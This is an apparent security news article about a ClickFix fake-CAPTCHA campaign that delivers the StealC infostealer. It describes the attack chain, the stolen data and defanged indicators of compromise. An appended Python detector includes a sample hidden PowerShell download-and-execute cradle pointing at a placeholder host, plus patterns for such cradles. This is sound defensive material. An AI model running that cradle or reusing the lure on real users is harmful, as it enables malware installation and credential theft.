Security researchers are warning of a new malware campaign that uses a deceptive verification technique called ClickFix to target Windows users. The StealC information stealer is covertly installed through a multi-stage infection chain and social engineering.

This popular cybercrime tool harvests sensitive financial and personal information. The attack relies heavily on fileless techniques: the attackers execute code directly in memory rather than dropping obvious malware files, which makes the activity hard for conventional antivirus software to detect.

How the Campaign Begins

The infection starts when a victim visits a legitimate website that has been quietly compromised. In the observed cases, a malicious script that loads a fake CAPTCHA page was injected into a restaurant website. The page imitates a Cloudflare security check.

Four separate stages of payload delivery and execution are depicted in this multi-stage infection chain, which runs from the first PowerShell command to the StealC deployment (Source: levelblue).

Victims are instructed to complete the "verification" by:
• pressing Windows + R
• pasting a command that has already been copied to the clipboard
• hitting Enter, which launches a hidden PowerShell command

The command contacts a remote server and downloads the loader script straight into memory, without ever saving it to disk.

The loader reflectively loads a 64-bit Windows downloader by allocating memory and running position-independent shellcode. That downloader retrieves the final payload and injects it into a trusted Windows process such as svchost.exe. Because the malware runs inside a legitimate service, it looks normal to the operating system. StealC is installed in the final step.

The compromised website loads a malicious script (Source: levelblue).

Inside the Multi-Stage Chain and Data Theft

The infection chain has four steps: PowerShell → Shellcode → PE Downloader → StealC. The shellcode was generated with a framework that embeds a complete executable into memory. After that, the downloader deletes itself and performs the process injection, leaving minimal forensic evidence behind.

Once operational, StealC communicates with its command-and-control server over HTTP, with the traffic encrypted using RC4 and encoded with Base64. According to the researchers, decryption tools and indicators of compromise (IOCs) now allow defenders to identify this traffic. StealC is a highly capable stealer.

It steals:
• browser passwords, cookies, and autofill data
• cryptocurrency wallets and seed phrases
• Steam game accounts
• Outlook credentials
• system information and hardware fingerprint
• desktop screenshots
• documents and database files

Beyond browsers such as Chrome, Edge, and Firefox, the malware looks for more than 50 cryptocurrency wallet extensions. It also collects email passwords stored in the registry and uploads everything to its control server in structured JSON format. Large files are split into smaller pieces to evade network detection.

Malicious JavaScript loads the fake ClickFix/CAPTCHA page (Source: levelblue).

Notably, the malware does not persist on the computer: it can delete itself after the data theft to reduce the amount of evidence left behind.

Indicators of compromise listed by the researchers:
• IP 94.154.35.115 (payloads)
• IP 91.92.240.219 (PowerShell)
• IP 91.92.240.190 (C2)
• URL hxxp://94[.]154[.]35[.]115/user_profiles_photo/cptch[.]bin
• URL hxxps://goveanrs[.]org/jsrepo
• URL hxxps://madamelam[.]com
• SHA-256 dc38f3f3c8d495da8c3b0aca8997498e9e4d19738e1e2a425af635d37d0e06b8 (cptchbuild.bin)

The researchers stress that human trust is the primary vulnerability being exploited. Users should never run commands that a website's "verification" page tells them to run. Organizations are advised to watch for injected processes, outgoing encrypted HTTP traffic to unknown servers, and unusual PowerShell activity.
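To make the "unusual PowerShell activity" recommendation concrete, here is an added example (not code from the article or the LevelBlue report) that scores constructed Sysmon-style process-creation records for the ClickFix launch pattern described above: PowerShell spawned from explorer.exe via the Run dialog, with hidden-window flags and an in-memory download cradle. The field names, sample records and placeholder URL are assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    # ClickFix-style launch: Run dialog -> hidden PowerShell -> in-memory download.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://PLACEHOLDER.invalid/x')\""},
    # Benign-looking scripted admin tooling: on-disk script, non-shell parent.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\Updater.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\Vendor\\update.ps1"},
]

# Patterns matched against the lower-cased command line.
CRADLE_PATTERNS = [r"\biex\b", r"invoke-expression", r"downloadstring",
                   r"invoke-webrequest", r"\biwr\b", r"-enc(odedcommand)?\b",
                   r"frombase64string"]
HIDDEN_PATTERNS = [r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b"]


def score_event(ev):
    """Return the reasons an event resembles a ClickFix-style PowerShell launch."""
    reasons = []
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    # The Win+R Run dialog spawns PowerShell under explorer.exe, which scripted
    # admin tooling normally does not.
    if parent.endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if any(re.search(p, cmd) for p in HIDDEN_PATTERNS):
        reasons.append("hidden/non-interactive window flags")
    if any(re.search(p, cmd) for p in CRADLE_PATTERNS):
        reasons.append("in-memory download cradle")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Return (index, reasons) for events with at least min_reasons indicators."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits
```

Requiring two independent indicators keeps a lone `-NoProfile` from an admin script from paging anyone, while the Run-dialog parent plus a download cradle still trips the rule.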